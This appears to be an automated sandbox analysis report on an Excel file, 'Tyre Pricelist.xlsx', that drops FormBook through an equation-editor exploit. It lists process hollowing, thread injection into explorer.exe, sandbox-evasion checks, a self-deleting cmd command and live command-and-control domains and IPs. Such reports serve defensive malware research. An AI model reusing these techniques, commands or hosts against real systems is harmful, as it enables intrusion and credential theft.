          Source: vbc.exe.2.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine, Classification label: mal100.troj.expl.evad.winXLSX@15/3@3/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$Tyre Pricelist.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR167C.tmp
          Source: C:\Windows\SysWOW64\cmd.exe, Console Write: C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmd.exe, Console Write: Access is denied.
          Source: C:\Users\Public\vbc.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: Tyre Pricelist.xlsx, Virustotal: Detection: 27%
          Source: Tyre Pricelist.xlsx, ReversingLabs: Detection: 20%
          Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknown, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: unknown, Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exe, Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Users\Public\vbc.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window Recorder, Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Tyre Pricelist.xlsx, Static file information: File size 2481664 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: netstat.pdb source: RegAsm.exe, 00000006.00000002.2216733185.00000000002AC000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, NETSTAT.EXE
          Source: Tyre Pricelist.xlsx, Initial sample: OLE indicators vbamacros = False
          Source: Tyre Pricelist.xlsx, Initial sample: OLE indicators encrypted = True
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_004169BB push esi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_0040AB07 push ds; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_00414E05 push ss; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_0041CEF2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_0041CEFB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_0041CEA5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_0041CF5C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_0253DFA1 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 6_2_008BE3E6 pushad ; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_00C5DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_000969BB push esi; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_0008AB07 push ds; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_00094E05 push ss; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_0009CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_0009CEFB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_0009CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 11_2_0009CF5C push eax; ret
          Source: initial sample, Static PE information: section name: .text entropy: 7.86101767821
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86101767821
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Tyre Pricelist.xlsx Stream path 'EncryptedPackage' entropy: 7.99990874269 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00409A80 rdtsc
          Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2312 Thread sleep time: -600000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2312 Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2852 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1028 Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2792 Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: explorer.exe, 00000008.00000000.2195905720.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2195930898.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2195905720.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2190381615.0000000000946000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02530048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe Code function: 4_2_002F00AD mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe Code function: 4_2_002F00AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe Code function: 4_2_002F01CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_025200EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02520080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_025426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
          Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 91.195.241.137 80
          Source: C:\Windows\explorer.exe Network Connect: 180.215.92.80 80
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: FF0000
          Writes to foreign memory regions
          Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
          Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Disable or Modify Tools 1 | Credential API Hooking 1 | System Network Connections Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 41 | Security Account Manager | System Information Discovery 112 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 3 | NTDS | Security Software Discovery 221 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 22 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion 1 | LSA Secrets | Virtualization/Sandbox Evasion 3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rootkit 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 111 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 3 | Proc Filesystem | System Network Configuration Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 612 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |

          Behavior Graph

          Behavior Graph ID: 321115  Sample: Tyre Pricelist.xlsx  Start date: 20/11/2020  Architecture: WINDOWS  Score: 100

          The graph is rendered as an image; the process tree, network contacts and per-node signatures it carries are:

          Root signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 14 other signatures
          EXCEL.EXE: dropped C:\Users\user\Desktop\~$Tyre Pricelist.xlsx (data)
          EQNEDT32.EXE: contacted workfinethdysanotherrainbowlomoyentthghf.ydns.eu 103.125.191.5, 49165, 80 (VNPT-AS-VN, Viet Nam); dropped C:\Users\user\AppData\...\svchost[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started vbc.exe
          vbc.exe: signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures; started RegAsm.exe (two instances) and cmd.exe
          RegAsm.exe (first instance): signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); injected into explorer.exe
          RegAsm.exe (second instance): signature: Tries to detect virtualization through RDTSC time measurements
          cmd.exe: started choice.exe
          explorer.exe (injected): contacted www.pestigenix.com 91.195.241.137, 49166, 80 (SEDO-ASDE, Germany) and www.atlanticdentallab.com 180.215.92.80, 49167, 80 (BCPL-SGBGPNETGlobalASNSG, Singapore); signature: System process connects to network (likely due to code injection or exploit); started NETSTAT.EXE
          NETSTAT.EXE: signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Tyre Pricelist.xlsx | 27% | Virustotal |
          Tyre Pricelist.xlsx | 21% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | 100% | Avira | TR/AD.Swotter.sxyuz
          C:\Users\Public\vbc.exe | 100% | Avira | TR/AD.Swotter.sxyuz
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | 100% | Joe Sandbox ML |
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe | 33% | ReversingLabs | Win32.Trojan.Wacatac
          C:\Users\Public\vbc.exe | 33% | ReversingLabs | Win32.Trojan.Wacatac

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.2.vbc.exe.510000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.2.RegAsm.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.atlanticdentallab.com | 0% | Virustotal |
          workfinethdysanotherrainbowlomoyentthghf.ydns.eu | 4% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
          http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
          http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
          http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
          http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
          http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
          http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
          http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Virustotal |
          http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
          http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
          http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
          http://buscar.ozu.es/ | 0% | Avira URL Cloud | safe
          http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
          http://search.auction.co.kr/ | 0% | URL Reputation | safe
          http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
          http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
          http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
          http://google.pchome.com.tw/ | 0% | URL Reputation | safe
          http://www.ozu.es/favicon.ico | 0% | Avira URL Cloud | safe
          http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
          http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
          http://searchresults.news.com.au/ | 0% | URL Reputation | safe
          http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
          http://search.yahoo.co.jp | 0% | URL Reputation | safe
          http://buscador.terra.es/ | 0% | URL Reputation | safe
          http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe
          http://www.iask.com/ | 0% | URL Reputation | safe
          http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
          http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation | safe
          http://p.zhongsou.com/favicon.ico | 0% | Avira URL Cloud | safe
          http://service2.bfast.com/ | 0% | URL Reputation | safe
          http://www.%s.comPA | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.atlanticdentallab.com | 180.215.92.80 | true | true | | unknown
www.pestigenix.com | 91.195.241.137 | true | true | | unknown
workfinethdysanotherrainbowlomoyentthghf.ydns.eu | 103.125.191.5 | true | true | | unknown

            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://search.chol.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.mercadolivre.com.br/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://search.ebay.de/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.mtv.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.rambler.ru/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.nifty.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.dailymail.co.uk/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www3.fnac.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://buscar.ya.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.yahoo.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.sogou.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://asp.usatoday.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
